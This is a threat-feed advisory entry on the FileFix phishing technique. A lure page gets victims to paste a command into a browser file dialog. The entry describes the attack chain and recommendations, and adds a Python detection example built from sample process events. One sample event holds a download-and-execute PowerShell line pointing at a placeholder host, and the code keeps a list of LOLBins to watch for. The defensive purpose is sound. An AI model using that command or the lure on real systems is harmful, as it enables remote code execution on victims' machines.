{
  "description": "Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.",
  "feed_url": "https://feed.craftedsignal.io/tags/filefix/",
  "home_page_url": "https://feed.craftedsignal.io/",
  "items": [
    {
      "_cs_actors": [],
      "_cs_cves": [],
      "_cs_exploited": false,
      "_cs_products": ["Elastic Defend", "Microsoft Defender XDR", "SentinelOne Cloud Funnel"],
      "_cs_severities": ["high"],
      "_cs_tags": ["phishing", "execution", "filefix", "clickfix", "windows"],
      "_cs_type": "advisory",
      "_cs_vendors": ["Elastic", "Microsoft", "SentinelOne"],
      "content_html": "\u003cp\u003eThis detection identifies FileFix, a variant of the ClickFix social-engineering technique in which a phishing page instructs the victim to paste a command into a dialog spawned by the browser, so that the command runs on the victim\u0026rsquo;s own machine under the victim\u0026rsquo;s account. FileFix abuses the browser\u0026rsquo;s native file-picker (file upload) dialog: the page copies a command to the clipboard, opens the picker, and tells the victim to paste the clipboard contents into the dialog\u0026rsquo;s address bar, which Windows treats as a command to launch. Because no file is downloaded, execution sidesteps download scanning and Mark-of-the-Web-based controls, and the resulting process is a child of a legitimate browser process. The rule looks for script interpreters and living-off-the-land binaries such as PowerShell, curl, and mshta whose parent process command line contains both \u003ccode\u003e--message-loop-type-ui\u003c/code\u003e and \u003ccode\u003e--service-sandbox-type=none\u003c/code\u003e, the arguments Chromium-based browsers pass to the unsandboxed utility process that hosts the file dialog. The rule is rated high severity because a single paste gives the attacker arbitrary command execution. It is maintained by Elastic, with the latest update on May 3, 2026, and supports Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, and Windows Sysmon as event sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim visits a phishing page that uses the FileFix technique.\u003c/li\u003e\n\u003cli\u003eThe page copies an attacker-controlled command to the victim\u0026rsquo;s clipboard.\u003c/li\u003e\n\u003cli\u003eThe page uses JavaScript to open the browser\u0026rsquo;s file-upload dialog, which on Windows is the native Open File dialog.\u003c/li\u003e\n\u003cli\u003eThe victim pastes the clipboard contents into the dialog\u0026rsquo;s address bar and presses Enter.\u003c/li\u003e\n\u003cli\u003eThe dialog, hosted in the browser\u0026rsquo;s unsandboxed utility process, launches the pasted command (e.g., powershell.exe or cmd.exe).\u003c/li\u003e\n\u003cli\u003eThe launched process runs the attacker\u0026rsquo;s command, typically downloading and executing a further payload.\u003c/li\u003e\n\u003cli\u003eThe attacker gains a foothold on the system, which can lead to data exfiltration, ransomware deployment, or other malicious activity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful FileFix attack yields arbitrary command execution in the victim\u0026rsquo;s session, which can lead to data theft, malware installation, system disruption, or complete system compromise. Because the victim triggers execution by hand, there is no downloaded file for anti-malware or Mark-of-the-Web controls to inspect, and the process tree (a browser utility process spawning PowerShell) can pass for ordinary user activity unless the parent\u0026rsquo;s arguments are examined. The severity is high given the damage a foothold enables and the ease with which the lure can be delivered through ordinary phishing campaigns. While the exact number of victims is not specified, the broad applicability of this technique makes it a significant threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM and tune it for your environment; a browser file-dialog process launching a script interpreter has few legitimate explanations, so the rule should produce little noise.\u003c/li\u003e\n\u003cli\u003eMake sure your telemetry records the parent process command line: Sysmon Event ID 1 includes \u003ccode\u003eParentCommandLine\u003c/code\u003e, as do the supported EDR sources, whereas Windows Security event 4688 records only the parent image and cannot drive this rule on its own.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for a parent process whose arguments include \u003ccode\u003e--message-loop-type-ui\u003c/code\u003e and \u003ccode\u003e--service-sandbox-type=none\u003c/code\u003e launching \u003ccode\u003epwsh.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003emsiexec.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, or \u003ccode\u003ecertreq.exe\u003c/code\u003e to identify potential FileFix attacks.\u003c/li\u003e\n\u003cli\u003eImplement user awareness training so that users treat any instruction to copy a command from a website and paste it into a dialog as a phishing lure.\u003c/li\u003e\n\u003cli\u003eBlock execution of processes from the \u003ccode\u003eC:\\Users\\*\\Downloads\\\u003c/code\u003e path unless explicitly approved and verified; this limits follow-on payloads rather than the initial paste, which involves no download.\u003c/li\u003e\n\u003c/ul\u003e\n",
      "date_modified": "2024-01-02T18:22:00Z",
      "date_published": "2024-01-02T18:22:00Z",
      "id": "/briefs/2024-01-filefix-phishing/",
      "summary": "Detects potential execution of Windows commands or downloaded files via the browser's dialog box, where adversaries may use phishing to instruct victims to copy and paste malicious commands for execution.",
      "title": "Potential Execution via FileFix Phishing Attack",
      "url": "https://feed.craftedsignal.io/briefs/2024-01-filefix-phishing/"
    }
  ],
  "language": "en",
  "title": "CraftedSignal Threat Feed — Filefix",
  "version": "https://jsonfeed.org/version/1.1"
}
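The parent-argument check the brief describes, as an added Python example written for this page (it is not the feed's Sigma rule or Elastic's rule): it runs the rule's logic over a handful of constructed Sysmon-style process events, requiring both utility-process flags on the parent, a browser as the parent image, and one of the listed child images. The browser image list, the `ProcessEvent` shape and every sample event are assumptions made for the example.

```python
"""Added example: FileFix parent-argument detection over constructed events.

Illustrative code for this brief, not the feed's Sigma rule or Elastic's rule.
The browser list and the sample events are assumptions for the example.
"""
from __future__ import annotations

import ntpath
import shlex
from dataclasses import dataclass

# Parent arguments named in the brief: Chromium-based browsers pass these to
# the unsandboxed utility process that hosts the native file dialog.
REQUIRED_PARENT_ARGS = frozenset({"--message-loop-type-ui", "--service-sandbox-type=none"})

# Child images named in the brief's recommendation list.
SUSPICIOUS_CHILDREN = frozenset({
    "pwsh.exe", "powershell.exe", "curl.exe", "msiexec.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe", "certutil.exe", "certreq.exe",
})

# Assumption: Chromium-based browser executables that can be the parent image.
BROWSER_IMAGES = frozenset({"chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe", "opera.exe"})


@dataclass(frozen=True)
class ProcessEvent:
    """The subset of Sysmon Event ID 1 fields the rule needs."""
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (Sysmon logs full image paths)."""
    return ntpath.basename(path).lower()


def _args(command_line: str) -> set[str]:
    """Split a Windows command line into lower-cased whitespace tokens.

    Non-POSIX shlex keeps a quoted image path together, which is all the flag
    match needs. A malformed line (e.g. an unterminated quote) falls back to a
    plain split instead of raising, so one bad event cannot crash the detector.
    """
    try:
        tokens = shlex.split(command_line, posix=False)
    except ValueError:
        tokens = command_line.split()
    return {t.lower() for t in tokens}


def is_filefix_execution(ev: ProcessEvent) -> bool:
    """True when a browser's file-dialog utility process spawns a listed LOLBin."""
    if _basename(ev.image) not in SUSPICIOUS_CHILDREN:
        return False
    if _basename(ev.parent_image) not in BROWSER_IMAGES:
        return False
    # Both flags are required; either one alone is an ordinary utility process.
    return REQUIRED_PARENT_ARGS <= _args(ev.parent_command_line)


def scan(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Return the events matching the FileFix pattern, in input order."""
    return [ev for ev in events if is_filefix_execution(ev)]


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FILE_DIALOG_PARENT = (f'"{CHROME}" --type=utility --message-loop-type-ui '
                      '--service-sandbox-type=none --lang=en-US')

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 1. FileFix: the file-dialog utility process launches PowerShell.
    ProcessEvent(POWERSHELL, 'powershell -w hidden -c "iwr https://example.invalid/p.ps1 | iex"',
                 CHROME, FILE_DIALOG_PARENT),
    # 2. Ordinary download: the browser main process opens a downloaded installer.
    #    Same parent image, but no file-dialog arguments.
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Users\alice\Downloads\setup.msi",
                 CHROME, f'"{CHROME}"'),
    # 3. Admin script: PowerShell started by the task scheduler, not a browser.
    ProcessEvent(POWERSHELL, r"powershell -File C:\Scripts\inventory.ps1",
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p -s Schedule"),
    # 4. Sandboxed utility process: only one of the two flags is present.
    ProcessEvent(r"C:\Windows\System32\mshta.exe", "mshta about:blank",
                 CHROME, f'"{CHROME}" --type=utility --message-loop-type-ui --service-sandbox-type=utility'),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"FileFix candidate: {hit.parent_image} -> {hit.image}: {hit.command_line}")
```

Only the first sample event fires. Matching on both flags is what keeps the rule quiet: Chromium launches many utility processes with `--message-loop-type-ui` or a sandbox type set, but the unsandboxed file-dialog host is the one that carries both, and a script interpreter beneath it is the FileFix signature. Feed `scan` with events from your own Sysmon or EDR export and extend `BROWSER_IMAGES` to the browsers deployed in your fleet.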